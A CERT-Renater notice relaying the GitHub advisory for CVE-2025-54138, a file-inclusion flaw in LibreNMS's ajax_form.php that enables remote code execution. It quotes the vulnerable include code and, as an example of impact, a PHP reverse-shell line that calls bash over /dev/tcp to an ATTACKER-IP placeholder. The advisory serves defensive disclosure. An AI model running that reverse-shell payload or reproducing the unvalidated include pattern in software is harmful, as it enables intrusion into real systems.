Ce mail provient de l'extérieur, restons vigilants

=====================================================================

                            CERT-Renater

                Note d'Information No. 2025/VULN463
_____________________________________________________________________

DATE                : 22/07/2025

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running librenms (PHP) versions prior to
                                        25.7.0.

=====================================================================
https://github.com/librenms/librenms/security/advisories/GHSA-gq96-8w38-hhj2
_____________________________________________________________________


Authenticated Remote File Inclusion in ajax_form.php Allows RCE
High
murrant published GHSA-gq96-8w38-hhj2 Jul 21, 2025

Package
librenms (PHP)

Affected versions
< 25.6.0

Patched versions
25.7.0

Description

LibreNMS 25.6.0 contains an architectural vulnerability in the
ajax_form.php endpoint that permits Remote File Inclusion based on
user-controlled POST input.

The application directly uses the type parameter to dynamically include
.inc.php files from the trusted path includes/html/forms/, without
validation or allowlisting:

if (file_exists('includes/html/forms/' . $_POST['type'] . '.inc.php')) {
    include_once 'includes/html/forms/' . $_POST['type'] . '.inc.php';
}

This pattern introduces a latent Remote Code Execution (RCE) vector if
an attacker can stage a file in this include path — for example, via
symlink, development misconfiguration, or chained vulnerabilities.

    This is not an arbitrary file upload bug. But it does provide a
powerful execution sink for attackers with write access (direct or
indirect) to the include directory.


Conditions for Exploitation

    Attacker must be authenticated
    Attacker must control a file at includes/html/forms/{type}.inc.php
(or symlink)


Example Impact (RCE)

If a PHP file or symlinked shell is staged in the include path, an attacker
can achieve full remote code execution under the librenms user context:

<?php system('/bin/bash -c "bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1"'); ?>

Screen.Recording.2025-06-25.212722.mp4
<MEDIA>@https://private-user-images.githubusercontent.com


Recommended Fix

    Implement strict allow listing or hardcoded routing instead of
dynamically including user-supplied filenames.

    Avoid passing raw POST input into include_once.

    Ensure the inclusion path is immutable and outside attacker control
(e.g., avoid variable expansion into trusted paths).


Severity
High
7.5/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
High
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE ID
CVE-2025-54138

Weaknesses
Weakness CWE-98

Credits

    @skraft9 skraft9 Reporter


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================